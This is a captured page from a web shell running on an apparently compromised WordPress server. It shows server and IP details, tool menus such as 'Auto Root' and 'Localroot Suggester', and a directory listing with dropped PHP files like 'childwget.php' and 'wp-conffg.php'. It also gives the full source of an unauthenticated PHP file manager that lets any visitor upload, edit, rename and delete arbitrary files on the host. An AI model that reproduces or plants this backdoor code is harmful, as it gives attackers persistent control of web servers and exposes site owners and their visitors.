Linux galileo.core-dns.net 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 104.255.170.81 & Your IP : 216.73.216.63
Domains :
Cant Read [ /etc/named.conf ]
User : coachingcprog
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
coachingcprog /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb
[ DIR ]
drwxrwxrwx
2026-06-23 18:37
.well-known
[ DIR ]
drwxr-xr-x
2025-02-19 05:53
ALFA_DATA
[ DIR ]
drwxr-xr-x
2026-06-24 01:55
cgi-bin
[ DIR ]
drwxr-xr-x
2026-06-24 01:55
wp-admin
[ DIR ]
drwxr-xr-x
2026-06-24 01:55
wp-content
[ DIR ]
drwxr-xr-x
2026-06-23 18:39
wp-includes
[ DIR ]
drwxr-xr-x
2026-06-24 08:09
.htaccess
626
B
-r--r--r--
2026-06-24 01:55
00.php
23.86
KB
-rw-r--r--
2026-06-24 01:27
77l.php
23.86
KB
-rw-r--r--
2026-06-24 01:22
aios-bootstrap.php
618
B
-rw-r--r--
2025-03-03 20:11
childwget.php
239
B
-rw-r--r--
2026-06-23 18:38
error_log
201.46
KB
-rw-r--r--
2026-06-24 05:13
goods.php
173.77
KB
-rw-------
2026-06-24 01:53
index.php
12.28
KB
-r--r--r--
2026-06-24 01:55
license.txt
19.44
KB
-rw-r--r--
2026-05-21 13:32
lobernok.php
8.49
KB
-rw-r--r--
2026-06-23 18:35
readme.html
7.23
KB
-rw-r--r--
2026-05-21 13:32
wp-activate.php
7.2
KB
-rw-r--r--
2026-05-21 13:32
wp-blog-header.php
351
B
-rw-r--r--
2020-02-06 14:33
wp-comments-post.php
2.27
KB
-rw-r--r--
2023-06-14 21:11
wp-conffg.php
127.58
KB
-rw-r--r--
2026-06-24 01:53
wp-config-sample.php
3.26
KB
-rw-r--r--
2025-12-03 17:11
wp-config.php
3.57
KB
-rw-r-----
2025-06-27 17:57
wp-cron.php
5.49
KB
-rw-r--r--
2024-08-03 02:40
wp-kautoata.php
1.09
KB
-rw-r--r--
2026-06-23 18:35
wp-links-opml.php
2.43
KB
-rw-r--r--
2025-12-03 17:11
wp-load.php
3.84
KB
-rw-r--r--
2024-03-11 17:05
wp-login.php
50.63
KB
-rw-r--r--
2026-05-21 13:32
wp-mail.php
8.52
KB
-rw-r--r--
2025-12-03 17:11
wp-settings.php
31.88
KB
-rw-r--r--
2026-05-21 13:32
wp-signup.php
33.81
KB
-rw-r--r--
2026-05-21 13:32
wp-trackback.php
5.09
KB
-rw-r--r--
2025-12-03 17:11
wper.php
12.19
KB
-rw-r--r--
2026-04-25 01:37
xmlrpc.php
3.13
KB
-rw-r--r--
2025-04-16 12:30
Save
Rename
<?php session_start(); // Safe directory control and path definitions $currentPath = realpath($_GET['path'] ?? getcwd()) ?: getcwd(); $action = $_GET['action'] ?? ''; $item = $_GET['item'] ?? ''; $itemPath = $item ? $currentPath . DIRECTORY_SEPARATOR . $item : ''; $statusMsg = ''; // 1. POST HANDLERS (Form Submissions) if ($_SERVER['REQUEST_METHOD'] === 'POST') { // File Upload if (!empty($_FILES['file']['name'])) { $target = $currentPath . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { $statusMsg = "File uploaded successfully."; } } // Create New Folder elseif (!empty($_POST['folder_name'])) { if (@mkdir($currentPath . DIRECTORY_SEPARATOR . $_POST['folder_name'])) { $statusMsg = "Folder created successfully."; } } // Create New File elseif (!empty($_POST['file_name'])) { if (@file_put_contents($currentPath . DIRECTORY_SEPARATOR . $_POST['file_name'], '') !== false) { $statusMsg = "Empty file created successfully."; } } // Edit / Save File Content elseif (isset($_POST['content']) && $item) { if (@file_put_contents($itemPath, $_POST['content']) !== false) { $statusMsg = "File updated successfully."; header("Location: ?path=" . urlencode($currentPath)); exit; } } // Rename File or Folder elseif (!empty($_POST['new_name']) && $item) { $newPath = $currentPath . DIRECTORY_SEPARATOR . $_POST['new_name']; if (@rename($itemPath, $newPath)) { $statusMsg = "Item renamed successfully."; header("Location: ?path=" . urlencode($currentPath)); exit; } } } // 2. GET HANDLERS (Actions like Delete) if ($action === 'delete' && $item && file_exists($itemPath)) { is_dir($itemPath) ? @rmdir($itemPath) : @unlink($itemPath); header("Location: ?path=" . urlencode($currentPath)); exit; } // Parent directory path $parentPath = dirname($currentPath); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Modern File Manager</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-color: #f4f6f9; color: #333; margin: 0; padding: 20px; } .container { max-width: 1000px; margin: 0 auto; background: #fff; padding: 20px; border-radius: 8px; box-shadow: 0 4px 6px rgba(0,0,0,0.1); } h3 { color: #4a5568; margin-bottom: 20px; word-break: break-all; } .btn-up { display: inline-block; padding: 8px 14px; background: #4a5568; color: #fff; text-decoration: none; border-radius: 4px; margin-bottom: 15px; font-size: 14px; } .btn-up:hover { background: #2d3748; } .alert { padding: 10px; background: #e6fffa; color: #234e52; border-left: 5px solid #319795; margin-bottom: 15px; border-radius: 4px; } ul { list-style: none; padding: 0; margin: 0; border: 1px solid #e2e8f0; border-radius: 6px; } li { padding: 12px 15px; border-bottom: 1px solid #e2e8f0; display: flex; justify-content: space-between; align-items: center; } li:last-child { border-bottom: none; } li:hover { background-color: #f7fafc; } a { color: #3182ce; text-decoration: none; } a:hover { text-decoration: underline; } .actions a { margin-left: 10px; font-size: 13px; } .delete { color: #e53e3e; } .forms-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(250px, 1fr)); gap: 20px; margin-top: 30px; padding-top: 20px; border-top: 2px solid #edf2f7; } .form-group { background: #f7fafc; padding: 15px; border-radius: 6px; border: 1px solid #e2e8f0; } .form-group h4 { margin: 0 0 10px 0; color: #4a5568; } input[type="text"], textarea { width: 100%; padding: 8px; box-sizing: border-box; border: 1px solid #cbd5e0; border-radius: 4px; margin-bottom: 10px; } button { background: #3182ce; color: white; border: none; padding: 8px 12px; border-radius: 4px; cursor: pointer; } button:hover { background: #2b6cb0; } .editor-box { background: #f7fafc; padding: 20px; border-radius: 6px; margin-bottom: 20px; border: 1px solid #e2e8f0; } </style> </head> <body> <div class="container"> <?php if ($statusMsg): ?> <div class="alert"><?= htmlspecialchars($statusMsg) ?></div> <?php endif; ?> <a class="btn-up" href="?path=<?= urlencode($parentPath) ?>">⬆ Go Up One Level</a> <h3>Current Location: <code><?= htmlspecialchars($currentPath) ?></code></h3> <!-- DYNAMIC EDITOR AND RENAME SECTIONS --> <?php if ($action === 'edit' && $item && file_exists($itemPath)): ?> <div class="editor-box"> <h4>📄 Editing: <?= htmlspecialchars($item) ?></h4> <form method="POST"> <textarea name="content" style="height:300px; font-family: monospace;"><?= htmlspecialchars(file_get_contents($itemPath)) ?></textarea> <button type="submit">Save Changes</button> <a href="?path=<?= urlencode($currentPath) ?>" style="margin-left: 10px; color: #718096;">Cancel</a> </form> </div> <?php elseif ($action === 'rename' && $item && file_exists($itemPath)): ?> <div class="editor-box"> <h4>✏️ Rename: <?= htmlspecialchars($item) ?></h4> <form method="POST"> <input type="text" name="new_name" placeholder="Enter new name" value="<?= htmlspecialchars($item) ?>" required> <button type="submit">Rename</button> <a href="?path=<?= urlencode($currentPath) ?>" style="margin-left: 10px; color: #718096;">Cancel</a> </form> </div> <?php endif; ?> <!-- DIRECTORY LISTING --> <ul> <?php $items = array_diff(scandir($currentPath), ['.', '..']); if (empty($items)): ?> <li><em style="color: #a0aec0;">This folder is empty.</em></li> <?php else: foreach ($items as $i): $fullP = $currentPath . DIRECTORY_SEPARATOR . $i; $isDir = is_dir($fullP); ?> <li> <?php if ($isDir): ?> <a href="?path=<?= urlencode($fullP) ?>">📁 <strong><?= htmlspecialchars($i) ?></strong></a> <div class="actions"> <a class="delete" href="?path=<?= urlencode($currentPath) ?>&action=delete&item=<?= urlencode($i) ?>" onclick="return confirm('Are you sure you want to delete this folder?')">Delete</a> </div> <?php else: ?> <span>📄 <?= htmlspecialchars($i) ?></span> <div class="actions"> <a href="?path=<?= urlencode($currentPath) ?>&action=edit&item=<?= urlencode($i) ?>">Edit</a> | <a href="?path=<?= urlencode($currentPath) ?>&action=rename&item=<?= urlencode($i) ?>">Rename</a> | <a class="delete" href="?path=<?= urlencode($currentPath) ?>&action=delete&item=<?= urlencode($i) ?>" onclick="return confirm('Are you sure you want to delete this file?')">Delete</a> </div> <?php endif; ?> </li> <?php endforeach; endif; ?> </ul> <!-- TOOLS AND FORMS GRID --> <div class="forms-grid"> <div class="form-group"> <h4>Upload File</h4> <form method="POST" enctype="multipart/form-data"> <input type="file" name="file" required style="margin-bottom: 10px;"><br> <button type="submit">Upload</button> </form> </div> <div class="form-group"> <h4>New Folder</h4> <form method="POST"> <input type="text" name="folder_name" placeholder="Folder name" required> <button type="submit">Create</button> </form> </div> <div class="form-group"> <h4>New Empty File</h4> <form method="POST"> <input type="text" name="file_name" placeholder="file.txt" required> <button type="submit">Create</button> </form> </div> </div> </div> </body> </html>